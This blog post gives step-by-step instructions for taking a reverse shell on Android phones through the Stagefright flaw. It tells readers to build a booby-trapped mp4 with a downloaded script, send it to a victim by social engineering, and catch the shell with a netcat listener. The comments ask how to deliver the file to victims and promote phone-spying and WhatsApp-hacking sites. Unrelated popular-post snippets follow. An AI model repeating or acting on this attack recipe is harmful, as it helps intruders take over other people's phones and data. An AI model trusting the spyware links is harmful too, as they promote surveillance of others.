Skip to main content

How to hack Andriod using Stagefright Vulnerability




Today i am going to demonstrate a exploit to take reverse shell in android,before i explain the demo i want to explain some things related to  this hack or exploit and also this for education and awareness about security of your devices.

What is Stagefright?

Android includes Stagefright, a media playback engine at the native level that has built-in software-based codecs for popular media formats.

Stagefright audio and video playback features include integration with OpenMAX codecs, session management, time-synchronized rendering, transport control, and DRM.

Stagefright also supports integration with custom hardware codecs provided by you. To set a hardware path to encode 
and decode media, you must implement a hardware-based codec as an OpenMax IL (Integration Layer) component.  

How hacker can exploit this Stagefright Library?

This critical vulnerability was discovered by a researcher at Cyber Security Firm called Zimperium. This  vulnerability is a type of buffer overflow attack and in this attack hacker don't need any kind of user interaction.In this vulnerability hacker sends a mp4 video that crash Stagefright library and restart the process with reverse shell.


Demo:-

1.Boot up your kali linux.

2.Download the python script from this link and rename file as mp4.py

3.Run this command as explained in this pic for example:-
"python 'address of script' -c your local ip -p any open port -o file name of video".



4.Then send this file to your victim by using your social engineering skills.

5.After victim trapped in attack then site listing port by using this command "netcat -l -p port which used while creating your attack video".

This attack work only on android 2.1-5.0.

If  you want to check that are you vulnerable to this attack then  scan your device by downloading app from play store.

If you are vulnerable then update your device to latest version.

I hope you understand this article well.

Don't forget to like our YouTube and Facebook Page.

Comments

  1. How to send the file to the victim

    ReplyDelete
  2. Please help us out. How do we send the file?

    ReplyDelete
  3. You can use www.textport.com/send_picture.aspx

    ReplyDelete
  4. I use a tracking app from MxSpy http://mxspy.com/how-to-hack-a-phone/ to hack a phone. I don't try to track group chats, but I think it should work.

    ReplyDelete
  5. There are many different types of smartphones available for purchase and use at this time. Consumers have a choice between the different brands of equipment as well. One of the fastest growing mobile operating systems is Google Android.
    in app purchase hack

    ReplyDelete
  6. Android Inc. Made the initial Android operating system and was bought by Google in 2008. Since then, Google has operated the Android system and has continued its growth.Game killer apk

    ReplyDelete
  7. i found this the best way to hack whatsapp www.zimleadershipmag.co.zw

    ReplyDelete

Post a Comment

Popular posts from this blog

The Best way to Track your Facebook Login Location and Receive the Login Alerts

I think about One-Fourth of the total world population is on Facebook and Whatsapp. Facebook hacking has become common so we all should look towards our safety so that no one else could use our account for something doing illegal purposes and we should know that when our account was last logged in and from which location.

By the Way Facebook provides both the Features for your Safety and has a lot of many Additional Features.When someone or you log in into your account, facebook notify you by sending you a message at your Registered Phone Number and your registered Email-ID.It also has a feature that you can see at which place you were last logged in.

Follow the Below Steps to Track your Facebook Login Location ::

1)First of all open up a browser and log in into your Facebook account.
2)At the Right most End below the Address Bar there will be a Down Arrow.Click on that arrow.
3)Now click on the Settings Option.Then Click on Security below the General option.
4)Now click on the Edit button …

How to Transfer Your Android SmartPhone to PC from Wifi Wirelessly The Best Way

Everybody in today's World is on Internet and they have become very Modern and Work Smartly in their life and make full use of the Internet to do their work more efficiently and Simply.
If you have a Android Smart Phone,What would you do if you want to see your mobile stuff on your Windows ?Buy a Card Reader or use a Data Cable or use Shareit or something like that to transfer your Data to your Windows and Then Access it.
I got a Better and Of course a Smart Way to do this with a help of a Simple app called Airdroid.And I bet you that It will the Best Android App you have ever seen.

Follow the Below Steps to Transfer your Android Phone to PC ::

1)Download the Airdroid App from PlayStore and install it.
2)Open the App and first Sign Up.You can Sign up using Google+,Facebook or Twitter also.
3)A small Window will appear asking for View all App and System Notifications on the Computer in real time.Click on the Enable Button.
4)Then your Mobile Accessibility Settings will be open.Under the S…